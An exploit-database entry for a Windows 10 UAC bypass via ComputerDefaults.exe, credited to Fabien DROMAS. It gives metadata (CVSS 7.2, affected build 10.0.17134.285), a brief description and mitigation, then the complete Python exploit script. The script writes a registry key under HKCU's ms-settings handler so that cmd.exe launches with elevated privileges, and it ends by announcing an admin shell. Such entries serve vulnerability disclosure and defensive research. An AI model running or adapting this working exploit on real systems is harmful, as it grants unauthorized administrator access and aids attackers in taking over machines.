header-logo
Suggest Exploit
vendor:
Windows 10
by:
Fabien DROMAS
7.2
CVSS
HIGH
UAC Bypass
N/A
CWE
Product Name: Windows 10
Affected Version From: Windows 10 pro Version 10.0.17134.285
Affected Version To: Windows 10 pro Version 10.0.17134.285
Patch Exists: NO
Related CWE: N/A
CPE: o:microsoft:windows_10::-:pro
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2018

Windows 10 UAC Bypass by computerDefault

This exploit uses the ComputerDefaults.exe binary to bypass UAC on Windows 10. It creates a registry key in the HKEY_CURRENT_USER hive and sets the DelegateExecute value to an empty string. It then sets the (Default) value to cmd.exe, which is then executed by ComputerDefaults.exe with elevated privileges.

Mitigation:

Ensure that UAC is enabled and set to the highest level.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title: Windows 10 UAC Bypass by computerDefault
# Date: 2018-10-18
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.285
# Tested on: Windows 10 pro Version 10.0.17134.285
#

import os
import sys
import ctypes
import _winreg


def create_reg_key(key, value):
    try:        
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)                
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)        
        _winreg.CloseKey(registry_key)
    except WindowsError:        
        raise

def exec_bypass_uac(cmd):
    try:
        create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)    
    except WindowsError:
        raise

def bypass_uac():        
 try:                
    current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
    cmd = "C:\windows\System32\cmd.exe"
    exec_bypass_uac(cmd)                
    os.system(r'C:\windows\system32\ComputerDefaults.exe')  
    return 1               
 except WindowsError:
    sys.exit(1)       

if __name__ == '__main__':

    if bypass_uac():
		print "Enjoy your Admin Shell :)"
cqrsecured